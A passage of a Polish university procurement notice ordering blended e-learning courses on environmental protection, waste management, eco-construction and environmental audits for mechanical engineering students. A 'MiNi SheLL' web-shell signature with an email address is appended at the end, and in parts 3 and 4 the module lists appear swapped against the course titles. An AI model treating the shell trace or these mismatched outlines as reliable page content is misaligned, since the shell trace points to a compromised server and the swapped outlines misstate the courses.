<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie materiałów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego. (stworzenie zaplecza) podstaw platformy informatycznej do  kursu blended-e-learningu z zakresu Racjonalna gospodarka zasobami naturalnymi oraz prowadzenie kursu Racjonalna gospodarka zasobami naturalnymi w formule blended e-learningu kończącego się uzyskaniem certyfikatu/zaświadczenia.

Materiały do kursu:
Kurs ma mieć 5 modułów (wariantów) - dla zajęć w 3 grupach ok. 15 os
1) Ochrona powierzchni ziemi i gleby
-kopaliny
-źródła zanieczyszczeń
-sposoby ochrony
2) Zasoby, wykorzystanie, zanieczyszczenie i ochrona wód
-źródła zanieczyszczeń wód
-zdolności zbiorników do autoregeneracji
-sposoby ochrony wód
-oczyszczalnie ścieków
3) Zanieczyszczenie i ochrona powietrza
-źródła zanieczyszczeń powietrza
-normy zanieczyszczeń obowiązujące w Polsce i w Europie
-sposoby przeciwdziałania zanieczyszczeniom
4)Promieniowanie. Hałas  (2 godz.)
-źródła hałasu
-źródła promieniowania
-ochrona przed hałasem i promieniowaniem
5) Ochrona przyrody i różnorodności biologicznej
-aspekty prawne - pozwolenia niezbędne do przeprowadzenia inwestycji/uruchomienia procesu przemysłowego
-obszary NATURA 2000
Przewidywany czas do zrealizowania 1 modułu = 40 godzin
1 kurs składać się będzie z minimum 100-120 stron (każdy moduł min. 20 stron)
Każdy moduł składać się będzie z ok 25 slajdów prezentacji.
Czcionka 12 odstęp 1-1,5

Materiały do kursu powinny zawierać teorię, przykłady oraz ćwiczenia lub testy. Zamawiający przekaże Wykonawcy wzór - formatkę (doc / .docx) z logotypami UE.
Wykonawca 7 dni roboczych od podpisania umowy przedstawi Zamawiającemu konspekt (plan kursu z podziałem na moduły)
Wykonawca dostarczy do siedziby Zamawiającego po 2 wydrukowane dwustronnie egzemplarze (zbindowane) każdego kursu oraz elektroniczną wersję kursu na CD/DVD (elektroniczne skrypty materiałów dydaktycznych, składających się na poszczególne moduły dostępne na platformie e-learningowej wraz z testami samodzielnej weryfikacji wiedzy) nie później niż do 15 lipca 2013 r.
Zamawiający ma 7 dni na zgłoszenie zmian i sugestii. Wykonawca w ciągu 7 dni wprowadzi poprawki. Wykonawca przekazuje materiały drogą elektroniczną na podany adres email.
Opracowane metodycznie kursy e-learnigowe powinny zawierać graficzno-multimedialne rozwiązania do samodzielnego uczenia się w trybie on-line, w tym sprawdzanie wiedzy. (Kurs powinien zawierać nie mniej niż 12 pytań testowych rozwiązywanych interaktywnie z automatyczną odpowiedzią.)
W opracowanych kursach przytaczane dane statystyczne powinny być nie starsze niż z 2005 roku.
Wykonawca zapewnia gwarancję techniczną wyprodukowanych kursów od momentu ich przyjęcia przez Zamawiającego do zakończenia kursu tj. od 01.10.2013 do końca 1 kwartału 2014 r. semestr zimowy roku akademickiego 2013/2014 (2 rok -3 semestr)
Zamawiający planuje udostępnienie platformy Moodle lub platformy stworzonej w oparciu o autorskie rozwiązania (metodologię)
Prowadzenie zajęć w formule blended learningu z możliwością konsultacji z osobą prowadzącą.
Zajęcia będą trwały 1 semestr (semestr zimowy 2013/2014) Zajęcia będą odbywały się w godzinach wyznaczonych przez Zamawiającego (pomiędzy 7.30 a 20.30) od poniedziałku do piątku
Zajęcia będą obowiązkowe dla wszystkich studentów na kierunku zamawianym w ok. 3 grupach po ok. 15 studentek/ów
Na jedną grupę przypada ok. 6 godzin w ciągu semestru (w tym część wykładowa ok. 2 godziny)
Zajęcia prowadzone będą na podstawie materiałów z podstaw platformy informatycznej do kursu blended-learningu z zakresu SZKOLENIA OCHRONA ŚRODOWISKA NATURALNEGO - kurs Racjonalna gospodarka zasobami naturalnymi. Prowadzący dostosuję realizację zadania odpowiednio do kierunku Mechanika i Budowa Maszyn.
Wykonawca w ramach zamówienia zobowiązany jest zorganizować seminarium w siedzibie Zamawiającego na którym na którym zaprezentowane zostaną wybrane prace zaliczeniowe. Seminarium zorganizowane zostanie w terminie wyznaczonym przez Zamawiającego (semestr zimowy 2013/2014)
14 dni przed datą rozpoczęcia zorganizowanego seminarium wykonawca dostarczy do siedziby zamawiającego ok 45 certyfikatów/zaświadczeń o ukończonym szkoleniu z ochrony środowiska Racjonalna gospodarka zasobami naturalnymi. (3 grupy/ok 15 os = razem ok. 45 certyfikatów) wraz z listami obecności studentów, ewidencją czasu pracy (wzór przekazany od Zamawiającego) i rachunkiem.
E-kurs nie może powstać jedynie poprzez umieszczenie materiałów tekstowych na platformie, lecz ma być interaktywny.
E-kurs ma zawierać:
1) nazwę i formy zajęć,
2) elementy informacyjne, o charakterze wstępnym i organizacyjnym, dotyczące danej formy zajęć (tj. warunki przystąpienia do zajęć i ich zaliczenia, informacje wstępne dotyczące samodzielnej pracy studenta w ramach e-kursu i sposobu rozliczania pracy studenta w ramach e-kursu),
3) elementy edukacyjne (tj. materiały wykładowe, materiały wykorzystywane na zajęciach i dodatkowe, instrukcje do zajęć laboratoryjnych, przykładowe zadania z rozwiązaniami, przykładowe prace studentów, linki do zasobów w Internecie i inne),
4) elementy weryfikacji wiedzy - tj. quizy, testy, zestawy zadań do samodzielnego rozwiązania - wykorzystujące mechanizmy losowości zaimplementowane na platformie Moodle,
5) elementy komunikacyjne (narzędzia komunikacji nauczyciel - student, tj. elektroniczne sprawozdania, narzędzia komunikacji i dyskusji, np. fora dyskusyjne).
Pytania kontrolne pogrupowane w quizy, bloki zadań do samodzielnego rozwiązywania oraz inne aktywności studenta (np. zapoznawanie się z instrukcjami do laboratoriów, przesłane e-sprawozdania) powinny być punktowane przez system. Ogólna liczba punktów zgromadzonych przez studenta w czasie jego aktywności w e-kursie powinna być uwzględniana w ramach warunków zaliczenia.
Z powodu dużej liczby zajęć dydaktycznych na kierunku Mechanika i Budowa Maszyn zajęcia dodatkowe muszą być prowadzone równolegle (co jest spowodowane również dostępnością sal przystosowanych do prowadzenia zajęć). Wykonawca do zrealizowania zamówienia wskaże jedną osobę fizyczną dla każdego zadania częściowego. Ta sama osoba fizyczna nie może wykonywać więcej niż jedno zadanie częściowe.
Wymagania dodatkowe (opcjonalne) które są pożądane przez Zamawiającego, ponieważ znacznie zwiększają innowacyjność projektu ale nie są bezwzględnie wymagane:
-prowadzenie zajęć z zakresu recyklingu i tworzyw polimerowych, prowadzenie laboratoriów z materiałów kompozytowych i ich przetwórstwa lub zajęć z ochrony środowiska, recyklingu maszyn itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.54.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended - e-learning-u z zakresu Godpodarka  odpadami oraz prowadzenie kursu Godpodarka  odpadami w formule blended e-learning-u kończącego się uzyskaniem certyfikatu - zaświadczenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie materiałów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego. (stworzenie zaplecza) podstaw platformy informatycznej do  kursu blended-learningu z zakresu Gospodarka  odpadami oraz prowadzenie kursu Gospodarka  odpadami w formule blended e-learningu kończącego się uzyskaniem certyfikatu/zaświadczenia.
Materiały do kursu:
Kurs ma mieć 5 modułów (wariantów) - dla zajęć w 3 grupach ok. 15 os
1) Rozwiązania proekologiczne:
-gospodarka energetyczna 
-gospodarka wodą pitną, wodą opadową, ściekami, jakość powietrza, aspekt społeczny
-domy pasywne - domy zero - domy energooszczędne - domy ekologiczne - przykłady realizacji 
2) Materiały konstrukcyjne
-materiały eksperymentalne - glina
-materiały kompozytowe
-możliwość zastosowania materiałów biodegradowalnych - korzyści i ograniczenia 
3) Możliwości wykorzystania materiałów z odzysku:
-wykorzystanie materiałów z recyklingu w budownictwie
-przykładowe systemy kontroli jakości wyrobów z recyklingu
4) Gospodarka energią cieplną i elektryczną w budynku.
-alternatywne źródła energii wykorzystywane w budownictwie
-instalacje: systemy grzewcze, wentylacja i klimatyzacja komfort użytkowania budynku - a wpływ na środowisko
-instalacje: oświetlenie sztuczne a energooszczędność 
5) Eksploatacja budynku - koszty i możliwości.
-analiza czynników obniżających koszty eksploatacji budynku
-Zintegrowane Systemy Sterowania w budynkach - Automatyka w budynku komfort, oszczędność, zyski dla środowiska 
Przewidywany czas do zrealizowania 1 modułu = 40 godzin
1 kurs składać się będzie z minimum 100-120 stron (każdy moduł min. 20 stron)
Każdy moduł składać się będzie z ok 25 slajdów prezentacji.
Czcionka 12 odstęp 1-1,5
Materiały do kursu powinny zawierać teorię, przykłady oraz ćwiczenia lub testy. Zamawiający przekaże Wykonawcy wzór - formatkę (doc / .docx) z logotypami UE.
Wykonawca 7 dni roboczych od podpisania umowy przedstawi Zamawiającemu konspekt (plan kursu z podziałem na moduły)
Wykonawca dostarczy do siedziby Zamawiającego po 2 wydrukowane dwustronnie egzemplarze (zbindowane) każdego kursu oraz elektroniczną wersję kursu na CD/DVD (elektroniczne skrypty materiałów dydaktycznych, składających się na poszczególne moduły dostępne na platformie e-learningowej wraz z testami samodzielnej weryfikacji wiedzy) nie później niż do 15 lipca 2013 r.
Zamawiający ma 7 dni na zgłoszenie zmian i sugestii. Wykonawca w ciągu 7 dni wprowadzi poprawki. Wykonawca przekazuje materiały drogą elektroniczną na podany adres email.
Opracowane metodycznie kursy e-learnigowe powinny zawierać graficzno-multimedialne rozwiązania do samodzielnego uczenia się w trybie on-line, w tym sprawdzanie wiedzy. (Kurs powinien zawierać nie mniej niż 12 pytań testowych rozwiązywanych interaktywnie z automatyczną odpowiedzią.)
W opracowanych kursach przytaczane dane statystyczne powinny być nie starsze niż z 2005 roku.
Wykonawca zapewnia gwarancję techniczną wyprodukowanych kursów od momentu ich przyjęcia przez Zamawiającego do zakończenia kursu tj. od 01.10.2013 do końca 1 kwartału 2014 r. semestr zimowy roku akademickiego 2013/2014 (2 rok -3 semestr)
Zamawiający planuje udostępnienie platformy Moodle lub platformy stworzonej w oparciu o autorskie rozwiązania (metodologię)
Prowadzenie zajęć w formule blended e-learningu z możliwością konsultacji z osobą prowadzącą.
Zajęcia będą trwały 1 semestr (semestr zimowy 2013/2014) Zajęcia będą odbywały się w godzinach wyznaczonych przez Zamawiającego (pomiędzy 7.30 a 20.30) od poniedziałku do piątku
Zajęcia będą obowiązkowe dla wszystkich studentów na kierunku zamawianym w ok. 3 grupach po ok. 15 studentek/ów
Na jedną grupę przypada ok. 6 godzin w ciągu semestru (w tym część wykładowa ok. 2 godziny)
Zajęcia prowadzone będą na podstawie materiałów z podstaw platformy informatycznej do kursu blended-learningu z zakresu SZKOLENIA OCHRONA ŚRODOWISKA NATURALNEGO - Godpodarka  odpadami. Prowadzący dostosuję realizację zadania odpowiednio do kierunku Mechanika i Budowa Maszyn.
Wykonawca w ramach zamówienia zobowiązany jest zorganizować seminarium w siedzibie Zamawiającego na którym na którym zaprezentowane zostaną wybrane prace zaliczeniowe. Seminarium zorganizowane zostanie w terminie wyznaczonym przez Zamawiającego (semestr zimowy 2013/2014)
14 dni przed datą rozpoczęcia zorganizowanego seminarium wykonawca dostarczy do siedziby zamawiającego ok 45 certyfikatów/zaświadczeń o ukończonym szkoleniu z ochrony środowiska Godpodarka  odpadami. (3 grupy/ok 15 os = razem ok. 45 certyfikatów) wraz z listami obecności studentów, ewidencją czasu pracy (wzór przekazany od Zamawiającego) i rachunkiem.
E-kurs nie może powstać jedynie poprzez umieszczenie materiałów tekstowych na platformie, lecz ma być interaktywny.
E-kurs ma zawierać:
1) nazwę i formy zajęć,
2) elementy informacyjne, o charakterze wstępnym i organizacyjnym, dotyczące danej formy zajęć (tj. warunki przystąpienia do zajęć i ich zaliczenia, informacje wstępne dotyczące samodzielnej pracy studenta w ramach e-kursu i sposobu rozliczania pracy studenta w ramach e-kursu),
3) elementy edukacyjne (tj. materiały wykładowe, materiały wykorzystywane na zajęciach i dodatkowe, instrukcje do zajęć laboratoryjnych, przykładowe zadania z rozwiązaniami, przykładowe prace studentów, linki do zasobów w Internecie i inne),
4) elementy weryfikacji wiedzy - tj. quizy, testy, zestawy zadań do samodzielnego rozwiązania - wykorzystujące mechanizmy losowości zaimplementowane na platformie Moodle,
5) elementy komunikacyjne (narzędzia komunikacji nauczyciel - student, tj. elektroniczne sprawozdania, narzędzia komunikacji i dyskusji, np. fora dyskusyjne).
Pytania kontrolne pogrupowane w quizy, bloki zadań do samodzielnego rozwiązywania oraz inne aktywności studenta (np. zapoznawanie się z instrukcjami do laboratoriów, przesłane e-sprawozdania) powinny być punktowane przez system. Ogólna liczba punktów zgromadzonych przez studenta w czasie jego aktywności w e-kursie powinna być uwzględniana w ramach warunków zaliczenia.
Z powodu dużej liczby zajęć dydaktycznych na kierunku Mechanika i Budowa Maszyn zajęcia dodatkowe muszą być prowadzone równolegle (co jest spowodowane również dostępnością sal przystosowanych do prowadzenia zajęć). Wykonawca do zrealizowania zamówienia wskaże jedną osobę fizyczną dla każdego zadania częściowego. Ta sama osoba fizyczna nie może wykonywać więcej niż jedno zadanie częściowe.
Wymagania dodatkowe (opcjonalne) które są pożądane przez Zamawiającego, ponieważ znacznie zwiększają innowacyjność projektu ale nie są bezwzględnie wymagane:
-prowadzenie zajęć z zakresu recyklingu i tworzyw polimerowych, prowadzenie laboratoriów z materiałów kompozytowych i ich przetwórstwa lub zajęć z ochrony środowiska, recyklingu maszyn itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended - e-learning-u z zakresu Ochrona środowiska - pro środowiskowe technologie konstrukcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie materiałów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego. (stworzenie zaplecza) podstaw platformy informatycznej do  kursu blended-e-learningu z zakresu Ochrona środowiska - pro środowiskowe technologie konstrukcyjne  oraz prowadzenie kursu Ochrona środowiska - pro środowiskowe technologie konstrukcyjne w formule blended e-learningu kończącego się uzyskaniem certyfikatu/zaświadczenia.
Materiały do kursu:
Kurs ma mieć 5 modułów (wariantów) - dla zajęć w 3 grupach ok. 15 os
1) Charakterystyka przepisów regulujących gosp. odpadami
-Podstawowe pojęcia w gosp. odpadami
-Wybrane regulacje prawne z zakresu przepisów z zakresu prawa UE i Pol.
2) Gosp. odpadami w firmie
-Zarządz. odpadami
-Plany gosp. odpadami
-Stosowane technologie w zakresie przetwarzania odpadów
3) Identyfikacja materiałów polimerowych i opakowań jako głównego źródła odpadów
-Rodzaje i sposoby identyfikacji wyrobów z tworzyw i kompozytów
-Przykłady systemów zbierania i identyfikacji odpadów
-Surowce do wytwarzania, metody otrzymywania i kierunki zastosowania, możliwość zastosowania materiałów ekologicznych zamiast surowców tradycyjnych
- Rodzaje polimerów i sposoby ich oznaczania, normy przedmiotowe
- Przegląd metod wytwarzania wyrobów z tworzyw - technologie niskoodpadowe i bezodpadowe
-Przykłady rozpoznawania odpadu po postaci wyrobu
-Jakość materiałów i wyrobów z recyklatów polimerowych
4) Metody zagospodarowania i utylizacji odpadów
-Recykling materiałowy
-Spalanie z odzyskiem energii
-Recykling chemiczny/surowcowy
-Kompostowanie i recykling biologiczny
5) Inne rodzaje odpadów i sposoby ich przetwarzania
-sprzęt elektryczny i elektroniczny
-baterie i akumulatory
-odpady mineralne
-inne odpady
Przewidywany czas do zrealizowania 1 modułu = 40 godzin
1 kurs składać się będzie z minimum 100-120 stron (każdy moduł min. 20 stron)
Każdy moduł składać się będzie z ok 25 slajdów prezentacji.
Czcionka 12 odstęp 1-1,5
Materiały do kursu powinny zawierać teorię, przykłady oraz ćwiczenia lub testy. Zamawiający przekaże Wykonawcy wzór - formatkę (doc / .docx) z logotypami UE.
Wykonawca 7 dni roboczych od podpisania umowy przedstawi Zamawiającemu konspekt (plan kursu z podziałem na moduły)
Wykonawca dostarczy do siedziby Zamawiającego po 2 wydrukowane dwustronnie egzemplarze (zbindowane) każdego kursu oraz elektroniczną wersję kursu na CD/DVD (elektroniczne skrypty materiałów dydaktycznych, składających się na poszczególne moduły dostępne na platformie e-learningowej wraz z testami samodzielnej weryfikacji wiedzy) nie później niż do 15 lipca 2013 r.
Zamawiający ma 7 dni na zgłoszenie zmian i sugestii. Wykonawca w ciągu 7 dni wprowadzi poprawki. Wykonawca przekazuje materiały drogą elektroniczną na podany adres email.
Opracowane metodycznie kursy e-learnigowe powinny zawierać graficzno-multimedialne rozwiązania do samodzielnego uczenia się w trybie on-line, w tym sprawdzanie wiedzy. (Kurs powinien zawierać nie mniej niż 12 pytań testowych rozwiązywanych interaktywnie z automatyczną odpowiedzią.)
W opracowanych kursach przytaczane dane statystyczne powinny być nie starsze niż z 2005 roku.
Wykonawca zapewnia gwarancję techniczną wyprodukowanych kursów od momentu ich przyjęcia przez Zamawiającego do zakończenia kursu tj. od 01.10.2013 do końca 1 kwartału 2014 r. semestr zimowy roku akademickiego 2013/2014 (2 rok -3 semestr)
Zamawiający planuje udostępnienie platformy Moodle lub platformy stworzonej w oparciu o autorskie rozwiązania (metodologię)
Prowadzenie zajęć w formule blended e-learningu z możliwością konsultacji z osobą prowadzącą.
Zajęcia będą trwały 1 semestr (semestr zimowy 2013/2014) Zajęcia będą odbywały się w godzinach wyznaczonych przez Zamawiającego (pomiędzy 7.30 a 20.30) od poniedziałku do piątku
Zajęcia będą obowiązkowe dla wszystkich studentów na kierunku zamawianym w ok. 3 grupach po ok. 15 studentek/ów
Na jedną grupę przypada ok. 6 godzin w ciągu semestru (w tym część wykładowa ok. 2 godziny)
Zajęcia prowadzone będą na podstawie materiałów z podstaw platformy informatycznej do kursu blended-learningu z zakresu SZKOLENIA OCHRONA ŚRODOWISKA NATURALNEGO Ochrona środowiska - pro środowiskowe technologie konstrukcyjne . Prowadzący dostosuję realizację zadania odpowiednio do kierunku Mechanika i Budowa Maszyn.
Wykonawca w ramach zamówienia zobowiązany jest zorganizować seminarium w siedzibie Zamawiającego na którym na którym zaprezentowane zostaną wybrane prace zaliczeniowe. Seminarium zorganizowane zostanie w terminie wyznaczonym przez Zamawiającego (semestr zimowy 2013/2014)
14 dni przed datą rozpoczęcia zorganizowanego seminarium wykonawca dostarczy do siedziby zamawiającego ok 45 certyfikatów/zaświadczeń o ukończonym szkoleniu z ochrony środowiska Ochrona środowiska - pro środowiskowe technologie konstrukcyjne . (3 grupy/ok 15 os = razem ok. 45 certyfikatów) wraz z listami obecności studentów, ewidencją czasu pracy (wzór przekazany od Zamawiającego) i rachunkiem.
E-kurs nie może powstać jedynie poprzez umieszczenie materiałów tekstowych na platformie, lecz ma być interaktywny.
E-kurs ma zawierać:
1) nazwę i formy zajęć,
2) elementy informacyjne, o charakterze wstępnym i organizacyjnym, dotyczące danej formy zajęć (tj. warunki przystąpienia do zajęć i ich zaliczenia, informacje wstępne dotyczące samodzielnej pracy studenta w ramach e-kursu i sposobu rozliczania pracy studenta w ramach e-kursu),
3) elementy edukacyjne (tj. materiały wykładowe, materiały wykorzystywane na zajęciach i dodatkowe, instrukcje do zajęć laboratoryjnych, przykładowe zadania z rozwiązaniami, przykładowe prace studentów, linki do zasobów w Internecie i inne),
4) elementy weryfikacji wiedzy - tj. quizy, testy, zestawy zadań do samodzielnego rozwiązania - wykorzystujące mechanizmy losowości zaimplementowane na platformie Moodle,
5) elementy komunikacyjne (narzędzia komunikacji nauczyciel - student, tj. elektroniczne sprawozdania, narzędzia komunikacji i dyskusji, np. fora dyskusyjne).
Pytania kontrolne pogrupowane w quizy, bloki zadań do samodzielnego rozwiązywania oraz inne aktywności studenta (np. zapoznawanie się z instrukcjami do laboratoriów, przesłane e-sprawozdania) powinny być punktowane przez system. Ogólna liczba punktów zgromadzonych przez studenta w czasie jego aktywności w e-kursie powinna być uwzględniana w ramach warunków zaliczenia.
Z powodu dużej liczby zajęć dydaktycznych na kierunku Mechanika i Budowa Maszyn zajęcia dodatkowe muszą być prowadzone równolegle (co jest spowodowane również dostępnością sal przystosowanych do prowadzenia zajęć). Wykonawca do zrealizowania zamówienia wskaże jedną osobę fizyczną dla każdego zadania częściowego. Ta sama osoba fizyczna nie może wykonywać więcej niż jedno zadanie częściowe.
Wymagania dodatkowe (opcjonalne) które są pożądane przez Zamawiającego, ponieważ znacznie zwiększają innowacyjność projektu ale nie są bezwzględnie wymagane:
-prowadzenie zajęć z zakresu recyklingu i tworzyw polimerowych, prowadzenie laboratoriów z materiałów kompozytowych i ich przetwórstwa lub zajęć z ochrony środowiska, recyklingu maszyn itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przygotowanie materiałów dla studentów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego - stworzenie zaplecza podstaw platformy informatycznej do kursów blended - e-learning-u z zakresu Audyt ekologiczny przedsiębiorstwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie materiałów dla studentów II roku kierunku Mechanika i Budowa Maszyn - kierunek zamawiany z zakresu ochrony środowiska naturalnego. (stworzenie zaplecza) podstaw platformy informatycznej do  kursu blended-e-learningu z zakresu Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego oraz prowadzenie kursu Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego w formule blended e-learningu kończącego się uzyskaniem certyfikatu/zaświadczenia.
Materiały do kursu:
Kurs ma mieć 5 modułów (wariantów) - dla zajęć w 3 grupach ok. 15 os
1) Audyt ekologiczny
-Podstawowe przepisy prawne
-Identyfikacja obszarów oddziaływania inwestycji/przedsiębiorstwa na środowisko
2) Charak. przepisów regulujących postęp. z odpadami w przedsiębiorstw.
-Zezwolenia oraz inne decyzje w zakresie gosp. odpadami
-Transport odpadów - wybrane zagad.
-Wybrane sposoby gosp. odpadami
3) Gosp. odpadami w przedsiębiorstwie
-Zarządz. odpadami w świetle przepisów prawnych
-Rodzaje odpadów i sposoby ich gromadzenia
-Opłaty opakowaniowe i produktowe
4) Ekonomiczne aspekty ochrony środowiska
-cykl życia produktu/technologii
-ocena ekonomicznych aspektów technologii prośrodowiskowych
5) Finansowanie wdrożenia nowych, proekologicznych technologii przetwarzania odpadów
-programy UE wspierające rozwiąz proekologiczne
-ocena projektu pod kątem doboru odpowiedniego finansowania zew.  warsztaty
-wyszukiwanie i określanie kryt. dostępu dla danego programu
-przygotowanie dokumentów aplikacyjnych
Przewidywany czas do zrealizowania 1 modułu = 40 godzin
1 kurs składać się będzie z minimum 100-120 stron (każdy moduł min. 20 stron)
Każdy moduł składać się będzie z ok 25 slajdów prezentacji.
Czcionka 12 odstęp 1-1,5
Materiały do kursu powinny zawierać teorię, przykłady oraz ćwiczenia lub testy. Zamawiający przekaże Wykonawcy wzór - formatkę (doc / .docx) z logotypami UE.
Wykonawca 7 dni roboczych od podpisania umowy przedstawi Zamawiającemu konspekt (plan kursu z podziałem na moduły)
Wykonawca dostarczy do siedziby Zamawiającego po 2 wydrukowane dwustronnie egzemplarze (zbindowane) każdego kursu oraz elektroniczną wersję kursu na CD/DVD (elektroniczne skrypty materiałów dydaktycznych, składających się na poszczególne moduły dostępne na platformie e-learningowej wraz z testami samodzielnej weryfikacji wiedzy) nie później niż do 15 lipca 2013 r.
Zamawiający ma 7 dni na zgłoszenie zmian i sugestii. Wykonawca w ciągu 7 dni wprowadzi poprawki. Wykonawca przekazuje materiały drogą elektroniczną na podany adres email.
Opracowane metodycznie kursy e-learnigowe powinny zawierać graficzno-multimedialne rozwiązania do samodzielnego uczenia się w trybie on-line, w tym sprawdzanie wiedzy. (Kurs powinien zawierać nie mniej niż 12 pytań testowych rozwiązywanych interaktywnie z automatyczną odpowiedzią.)
W opracowanych kursach przytaczane dane statystyczne powinny być nie starsze niż z 2005 roku.
Wykonawca zapewnia gwarancję techniczną wyprodukowanych kursów od momentu ich przyjęcia przez Zamawiającego do zakończenia kursu tj. od 01.10.2013 do końca 1 kwartału 2014 r. semestr zimowy roku akademickiego 2013/2014 (2 rok -3 semestr)
Zamawiający planuje udostępnienie platformy Moodle lub platformy stworzonej w oparciu o autorskie rozwiązania (metodologię)
Prowadzenie zajęć w formule blended e-learningu z możliwością konsultacji z osobą prowadzącą.
Zajęcia będą trwały 1 semestr (semestr zimowy 2013/2014) Zajęcia będą odbywały się w godzinach wyznaczonych przez Zamawiającego (pomiędzy 7.30 a 20.30) od poniedziałku do piątku
Zajęcia będą obowiązkowe dla wszystkich studentów na kierunku zamawianym w ok. 3 grupach po ok. 15 studentek/ów
Na jedną grupę przypada ok. 6 godzin w ciągu semestru (w tym część wykładowa ok. 2 godziny)
Zajęcia prowadzone będą na podstawie materiałów z podstaw platformy informatycznej do kursu blended-learningu z zakresu SZKOLENIA OCHRONA ŚRODOWISKA NATURALNEGO - Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego.  Prowadzący dostosuję realizację zadania odpowiednio do kierunku Mechanika i Budowa Maszyn.
Wykonawca w ramach zamówienia zobowiązany jest zorganizować seminarium w siedzibie Zamawiającego na którym na którym zaprezentowane zostaną wybrane prace zaliczeniowe. Seminarium zorganizowane zostanie w terminie wyznaczonym przez Zamawiającego (semestr zimowy 2013/2014)
14 dni przed datą rozpoczęcia zorganizowanego seminarium wykonawca dostarczy do siedziby zamawiającego ok 45 certyfikatów/zaświadczeń o ukończonym szkoleniu z ochrony środowiska Audyt ekologiczny przedsiębiorstwa - wybrane aspekty prawne związane z ochroną środowiska naturalnego. (3 grupy/ok 15 os = razem ok. 45 certyfikatów) wraz z listami obecności studentów, ewidencją czasu pracy (wzór przekazany od Zamawiającego) i rachunkiem.
E-kurs nie może powstać jedynie poprzez umieszczenie materiałów tekstowych na platformie, lecz ma być interaktywny.
E-kurs ma zawierać:
1) nazwę i formy zajęć,
2) elementy informacyjne, o charakterze wstępnym i organizacyjnym, dotyczące danej formy zajęć (tj. warunki przystąpienia do zajęć i ich zaliczenia, informacje wstępne dotyczące samodzielnej pracy studenta w ramach e-kursu i sposobu rozliczania pracy studenta w ramach e-kursu),
3) elementy edukacyjne (tj. materiały wykładowe, materiały wykorzystywane na zajęciach i dodatkowe, instrukcje do zajęć laboratoryjnych, przykładowe zadania z rozwiązaniami, przykładowe prace studentów, linki do zasobów w Internecie i inne),
4) elementy weryfikacji wiedzy - tj. quizy, testy, zestawy zadań do samodzielnego rozwiązania - wykorzystujące mechanizmy losowości zaimplementowane na platformie Moodle,
5) elementy komunikacyjne (narzędzia komunikacji nauczyciel - student, tj. elektroniczne sprawozdania, narzędzia komunikacji i dyskusji, np. fora dyskusyjne).
Pytania kontrolne pogrupowane w quizy, bloki zadań do samodzielnego rozwiązywania oraz inne aktywności studenta (np. zapoznawanie się z instrukcjami do laboratoriów, przesłane e-sprawozdania) powinny być punktowane przez system. Ogólna liczba punktów zgromadzonych przez studenta w czasie jego aktywności w e-kursie powinna być uwzględniana w ramach warunków zaliczenia.
Z powodu dużej liczby zajęć dydaktycznych na kierunku Mechanika i Budowa Maszyn zajęcia dodatkowe muszą być prowadzone równolegle (co jest spowodowane również dostępnością sal przystosowanych do prowadzenia zajęć). Wykonawca do zrealizowania zamówienia wskaże jedną osobę fizyczną dla każdego zadania częściowego. Ta sama osoba fizyczna nie może wykonywać więcej niż jedno zadanie częściowe.
Wymagania dodatkowe (opcjonalne) które są pożądane przez Zamawiającego, ponieważ znacznie zwiększają innowacyjność projektu ale nie są bezwzględnie wymagane:
-prowadzenie zajęć z zakresu recyklingu i tworzyw polimerowych, prowadzenie laboratoriów z materiałów kompozytowych i ich przetwórstwa lub zajęć z ochrony środowiska, recyklingu maszyn itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com